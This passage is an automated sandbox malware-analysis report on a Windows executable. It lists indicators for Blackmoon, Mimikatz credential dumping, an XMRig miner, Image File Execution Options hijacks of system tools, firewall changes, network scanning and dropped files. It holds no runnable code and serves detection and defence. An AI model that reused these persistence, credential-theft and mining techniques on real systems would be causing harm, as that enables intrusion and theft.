Analysis
-
max time kernel
120s -
max time network
122s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21-10-2024 11:27
Behavioral task
behavioral1
Sample
18b9cf6a369a93d5e56df3c42bf51cc743024b547d55868e21b5bfbe79e548edN.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
18b9cf6a369a93d5e56df3c42bf51cc743024b547d55868e21b5bfbe79e548edN.exe
Resource
win10v2004-20241007-en
General
-
Target
18b9cf6a369a93d5e56df3c42bf51cc743024b547d55868e21b5bfbe79e548edN.exe
-
Size
9.6MB
-
MD5
ad2540dfc8a1413c36b8ccead5d20290
-
SHA1
f9548d286b3aa095d3a9460d9bb2117f88f11193
-
SHA256
18b9cf6a369a93d5e56df3c42bf51cc743024b547d55868e21b5bfbe79e548ed
-
SHA512
8cf515a3fe2835bb546ee9c22f6cc27be13da87aeb0e951a034bf3acc64b4cc20e912bc3fedff210c7f6c2fc6928d59cd29985039ebaf1ff3228677f0cbe0c5a
-
SSDEEP
98304:TRoeO6XTBJYazImknGzZr+HIPFtmOZ9G17xwFB5URUSKnaSOdroSCa:NoeO6XTYxmknGzwHIPHd9swFBubKT
Malware Config
Signatures
-
Detect Blackmoon payload 6 IoCs
Processes:
resource yara_rule behavioral2/memory/4688-0-0x0000000000400000-0x0000000000ABA000-memory.dmp family_blackmoon behavioral2/memory/4688-4-0x0000000000400000-0x0000000000ABA000-memory.dmp family_blackmoon behavioral2/files/0x000a000000023b95-6.dat family_blackmoon behavioral2/memory/3588-8-0x0000000000400000-0x0000000000ABA000-memory.dmp family_blackmoon behavioral2/memory/1824-16-0x0000000000400000-0x0000000000463000-memory.dmp family_blackmoon behavioral2/memory/1824-19-0x0000000000400000-0x0000000000463000-memory.dmp family_blackmoon -
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
etkqeec.exedescription pid Process procid_target PID 4044 created 2152 4044 etkqeec.exe 38 -
Contacts a large (39642) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
Processes:
resource yara_rule behavioral2/memory/2016-165-0x0000000000400000-0x00000000009BE000-memory.dmp xmrig behavioral2/memory/2016-166-0x0000000000400000-0x00000000009BE000-memory.dmp xmrig behavioral2/memory/2016-218-0x0000000000400000-0x00000000009BE000-memory.dmp xmrig behavioral2/memory/2016-348-0x0000000000400000-0x00000000009BE000-memory.dmp xmrig behavioral2/memory/2016-828-0x0000000000400000-0x00000000009BE000-memory.dmp xmrig behavioral2/memory/2016-1089-0x0000000000400000-0x00000000009BE000-memory.dmp xmrig behavioral2/memory/2016-1097-0x0000000000400000-0x00000000009BE000-memory.dmp xmrig behavioral2/memory/2016-1117-0x0000000000400000-0x00000000009BE000-memory.dmp xmrig behavioral2/memory/2016-1131-0x0000000000400000-0x00000000009BE000-memory.dmp xmrig behavioral2/memory/2016-1134-0x0000000000400000-0x00000000009BE000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
Processes:
resource yara_rule behavioral2/memory/4688-0-0x0000000000400000-0x0000000000ABA000-memory.dmp mimikatz behavioral2/memory/4688-4-0x0000000000400000-0x0000000000ABA000-memory.dmp mimikatz behavioral2/files/0x000a000000023b95-6.dat mimikatz behavioral2/memory/3588-8-0x0000000000400000-0x0000000000ABA000-memory.dmp mimikatz behavioral2/memory/2620-150-0x00007FF61C190000-0x00007FF61C27E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
Processes:
etkqeec.exewpcap.exedescription ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts etkqeec.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts etkqeec.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 44 IoCs
Processes:
etkqeec.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" etkqeec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe etkqeec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe etkqeec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" etkqeec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" etkqeec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" etkqeec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe etkqeec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" etkqeec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" etkqeec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" etkqeec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" etkqeec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" etkqeec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe etkqeec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe etkqeec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe etkqeec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" etkqeec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" etkqeec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" etkqeec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe etkqeec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe etkqeec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" etkqeec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\schtasks.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" etkqeec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" etkqeec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" etkqeec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe etkqeec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\schtasks.exe etkqeec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe etkqeec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe etkqeec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" etkqeec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe etkqeec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe etkqeec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe etkqeec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" etkqeec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe etkqeec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe etkqeec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" etkqeec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cacls.exe etkqeec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe etkqeec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe etkqeec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" etkqeec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" etkqeec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" etkqeec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe etkqeec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe etkqeec.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid Process 4516 netsh.exe 4716 netsh.exe -
Executes dropped EXE 32 IoCs
Processes:
etkqeec.exeetkqeec.exerapttuvwncdetbc31301.exewpcap.exeetkqeec.exeibsgrteit.exeamydesk.exeecalbuvzn.exeiaacws.exevfshost.exeecalbuvzn.exevaltve.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exetbsnlrdsp.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exeetkqeec.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exepid Process 3588 etkqeec.exe 4044 etkqeec.exe 1824 rapttuvwncdetbc31301.exe 5084 wpcap.exe 2744 etkqeec.exe 1464 ibsgrteit.exe 3240 amydesk.exe 2860 ecalbuvzn.exe 4708 iaacws.exe 2620 vfshost.exe 4092 ecalbuvzn.exe 2016 valtve.exe 4620 ecalbuvzn.exe 2560 ecalbuvzn.exe 3316 ecalbuvzn.exe 460 ecalbuvzn.exe 1756 tbsnlrdsp.exe 5816 ecalbuvzn.exe 5396 ecalbuvzn.exe 3992 ecalbuvzn.exe 6004 ecalbuvzn.exe 6616 ecalbuvzn.exe 6240 ecalbuvzn.exe 5524 etkqeec.exe 4472 ecalbuvzn.exe 5800 ecalbuvzn.exe 2560 ecalbuvzn.exe 7024 ecalbuvzn.exe 1188 ecalbuvzn.exe 6812 ecalbuvzn.exe 2220 ecalbuvzn.exe 5996 ecalbuvzn.exe -
Loads dropped DLL 12 IoCs
Processes:
wpcap.exeibsgrteit.exepid Process 5084 wpcap.exe 5084 wpcap.exe 5084 wpcap.exe 5084 wpcap.exe 5084 wpcap.exe 5084 wpcap.exe 5084 wpcap.exe 5084 wpcap.exe 5084 wpcap.exe 1464 ibsgrteit.exe 1464 ibsgrteit.exe 1464 ibsgrteit.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
etkqeec.exedescription ioc Process Delete value \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger etkqeec.exe Delete value \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cacls.exe\Debugger etkqeec.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 58 ifconfig.me 59 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
Processes:
etkqeec.exewpcap.exeamydesk.exedescription ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BB4F4B8E2B2CFC476849B6B724C153FF etkqeec.exe File created C:\Windows\system32\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\iaacws.exe amydesk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE etkqeec.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft etkqeec.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache etkqeec.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content etkqeec.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 etkqeec.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\iaacws.exe amydesk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies etkqeec.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BB4F4B8E2B2CFC476849B6B724C153FF etkqeec.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData etkqeec.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 etkqeec.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 etkqeec.exe -
Processes:
resource yara_rule behavioral2/files/0x000a00000001e58b-15.dat upx behavioral2/memory/1824-16-0x0000000000400000-0x0000000000463000-memory.dmp upx behavioral2/memory/1824-19-0x0000000000400000-0x0000000000463000-memory.dmp upx behavioral2/files/0x000a000000023b9b-132.dat upx behavioral2/memory/2860-133-0x00007FF72CDA0000-0x00007FF72CDFB000-memory.dmp upx behavioral2/files/0x0008000000023c85-142.dat upx behavioral2/memory/2620-144-0x00007FF61C190000-0x00007FF61C27E000-memory.dmp upx behavioral2/memory/2860-149-0x00007FF72CDA0000-0x00007FF72CDFB000-memory.dmp upx behavioral2/memory/2620-150-0x00007FF61C190000-0x00007FF61C27E000-memory.dmp upx behavioral2/memory/4092-154-0x00007FF72CDA0000-0x00007FF72CDFB000-memory.dmp upx behavioral2/files/0x0008000000023c8a-156.dat upx behavioral2/memory/2016-158-0x0000000000400000-0x00000000009BE000-memory.dmp upx behavioral2/memory/4620-162-0x00007FF72CDA0000-0x00007FF72CDFB000-memory.dmp upx behavioral2/memory/2560-164-0x00007FF72CDA0000-0x00007FF72CDFB000-memory.dmp upx behavioral2/memory/2016-165-0x0000000000400000-0x00000000009BE000-memory.dmp upx behavioral2/memory/2016-166-0x0000000000400000-0x00000000009BE000-memory.dmp upx behavioral2/memory/3316-169-0x00007FF72CDA0000-0x00007FF72CDFB000-memory.dmp upx behavioral2/memory/460-173-0x00007FF72CDA0000-0x00007FF72CDFB000-memory.dmp upx behavioral2/memory/2016-218-0x0000000000400000-0x00000000009BE000-memory.dmp upx behavioral2/memory/5816-221-0x00007FF72CDA0000-0x00007FF72CDFB000-memory.dmp upx behavioral2/memory/5396-278-0x00007FF72CDA0000-0x00007FF72CDFB000-memory.dmp upx behavioral2/memory/2016-348-0x0000000000400000-0x00000000009BE000-memory.dmp upx behavioral2/memory/3992-374-0x00007FF72CDA0000-0x00007FF72CDFB000-memory.dmp upx behavioral2/memory/6004-643-0x00007FF72CDA0000-0x00007FF72CDFB000-memory.dmp upx behavioral2/memory/2016-828-0x0000000000400000-0x00000000009BE000-memory.dmp upx behavioral2/memory/6616-829-0x00007FF72CDA0000-0x00007FF72CDFB000-memory.dmp upx behavioral2/memory/6240-920-0x00007FF72CDA0000-0x00007FF72CDFB000-memory.dmp upx behavioral2/memory/2016-1089-0x0000000000400000-0x00000000009BE000-memory.dmp upx behavioral2/memory/4472-1092-0x00007FF72CDA0000-0x00007FF72CDFB000-memory.dmp upx behavioral2/memory/5800-1096-0x00007FF72CDA0000-0x00007FF72CDFB000-memory.dmp upx behavioral2/memory/2016-1097-0x0000000000400000-0x00000000009BE000-memory.dmp upx behavioral2/memory/2560-1106-0x00007FF72CDA0000-0x00007FF72CDFB000-memory.dmp upx behavioral2/memory/2016-1117-0x0000000000400000-0x00000000009BE000-memory.dmp upx behavioral2/memory/7024-1118-0x00007FF72CDA0000-0x00007FF72CDFB000-memory.dmp upx behavioral2/memory/1188-1126-0x00007FF72CDA0000-0x00007FF72CDFB000-memory.dmp upx behavioral2/memory/6812-1130-0x00007FF72CDA0000-0x00007FF72CDFB000-memory.dmp upx behavioral2/memory/2016-1131-0x0000000000400000-0x00000000009BE000-memory.dmp upx behavioral2/memory/2220-1133-0x00007FF72CDA0000-0x00007FF72CDFB000-memory.dmp upx behavioral2/memory/2016-1134-0x0000000000400000-0x00000000009BE000-memory.dmp upx behavioral2/memory/5996-1137-0x00007FF72CDA0000-0x00007FF72CDFB000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
Processes:
wpcap.exedescription ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 45 IoCs
Processes:
etkqeec.execmd.exetbsnlrdsp.exe18b9cf6a369a93d5e56df3c42bf51cc743024b547d55868e21b5bfbe79e548edN.exedescription ioc Process File created C:\Windows\glztnlvub\UnattendGC\specials\ssleay32.dll etkqeec.exe File created C:\Windows\glztnlvub\UnattendGC\specials\xdvl-0.dll etkqeec.exe File created C:\Windows\glztnlvub\UnattendGC\specials\docmicfg.exe etkqeec.exe File opened for modification C:\Windows\glztnlvub\Corporate\log.txt cmd.exe File created C:\Windows\glztnlvub\UnattendGC\specials\coli-0.dll etkqeec.exe File created C:\Windows\glztnlvub\UnattendGC\specials\schoedcl.xml etkqeec.exe File created C:\Windows\glztnlvub\rtbetdgqn\ip.txt etkqeec.exe File created C:\Windows\glztnlvub\rtbetdgqn\tbsnlrdsp.exe etkqeec.exe File created C:\Windows\glztnlvub\UnattendGC\specials\cnli-1.dll etkqeec.exe File created C:\Windows\glztnlvub\UnattendGC\specials\libxml2.dll etkqeec.exe File created C:\Windows\glztnlvub\UnattendGC\specials\zlib1.dll etkqeec.exe File created C:\Windows\glztnlvub\UnattendGC\specials\vimpcsvc.xml etkqeec.exe File created C:\Windows\glztnlvub\UnattendGC\specials\docmicfg.xml etkqeec.exe File created C:\Windows\glztnlvub\rtbetdgqn\ibsgrteit.exe etkqeec.exe File created C:\Windows\glztnlvub\UnattendGC\specials\tibe-2.dll etkqeec.exe File created C:\Windows\glztnlvub\UnattendGC\specials\ucl.dll etkqeec.exe File created C:\Windows\glztnlvub\UnattendGC\specials\vimpcsvc.exe etkqeec.exe File created C:\Windows\glztnlvub\UnattendGC\specials\spoolsrv.xml etkqeec.exe File opened for modification C:\Windows\Fonts\etkqeec.exe etkqeec.exe File created C:\Windows\glztnlvub\rtbetdgqn\Packet.dll etkqeec.exe File created C:\Windows\glztnlvub\UnattendGC\specials\exma-1.dll etkqeec.exe File created C:\Windows\glztnlvub\UnattendGC\specials\trch-1.dll etkqeec.exe File created C:\Windows\glztnlvub\UnattendGC\specials\schoedcl.exe etkqeec.exe File created C:\Windows\glztnlvub\UnattendGC\specials\svschost.exe etkqeec.exe File created C:\Windows\glztnlvub\UnattendGC\specials\svschost.xml etkqeec.exe File created C:\Windows\glztnlvub\UnattendGC\AppCapture32.dll etkqeec.exe File created C:\Windows\gcgzbiui\rapttuvwncdetbc31301.exe etkqeec.exe File created C:\Windows\Fonts\etkqeec.exe etkqeec.exe File created C:\Windows\glztnlvub\rtbetdgqn\wpcap.exe etkqeec.exe File created C:\Windows\glztnlvub\UnattendGC\specials\libeay32.dll etkqeec.exe File created C:\Windows\glztnlvub\UnattendGC\specials\posh-0.dll etkqeec.exe File created C:\Windows\glztnlvub\Corporate\mimidrv.sys etkqeec.exe File created C:\Windows\glztnlvub\rtbetdgqn\scan.bat etkqeec.exe File opened for modification C:\Windows\glztnlvub\rtbetdgqn\Result.txt tbsnlrdsp.exe File created C:\Windows\gcgzbiui\etkqeec.exe 18b9cf6a369a93d5e56df3c42bf51cc743024b547d55868e21b5bfbe79e548edN.exe File created C:\Windows\glztnlvub\UnattendGC\specials\crli-0.dll etkqeec.exe File created C:\Windows\glztnlvub\UnattendGC\specials\spoolsrv.exe etkqeec.exe File created C:\Windows\glztnlvub\UnattendGC\Shellcode.ini etkqeec.exe File created C:\Windows\glztnlvub\Corporate\vfshost.exe etkqeec.exe File created C:\Windows\glztnlvub\Corporate\mimilib.dll etkqeec.exe File opened for modification C:\Windows\gcgzbiui\etkqeec.exe 18b9cf6a369a93d5e56df3c42bf51cc743024b547d55868e21b5bfbe79e548edN.exe File created C:\Windows\glztnlvub\rtbetdgqn\wpcap.dll etkqeec.exe File created C:\Windows\glztnlvub\UnattendGC\specials\trfo-2.dll etkqeec.exe File created C:\Windows\glztnlvub\UnattendGC\specials\tucl-1.dll etkqeec.exe File created C:\Windows\glztnlvub\UnattendGC\AppCapture64.dll etkqeec.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid Process 2560 sc.exe 2544 sc.exe 3180 sc.exe 1896 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exedescription ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried 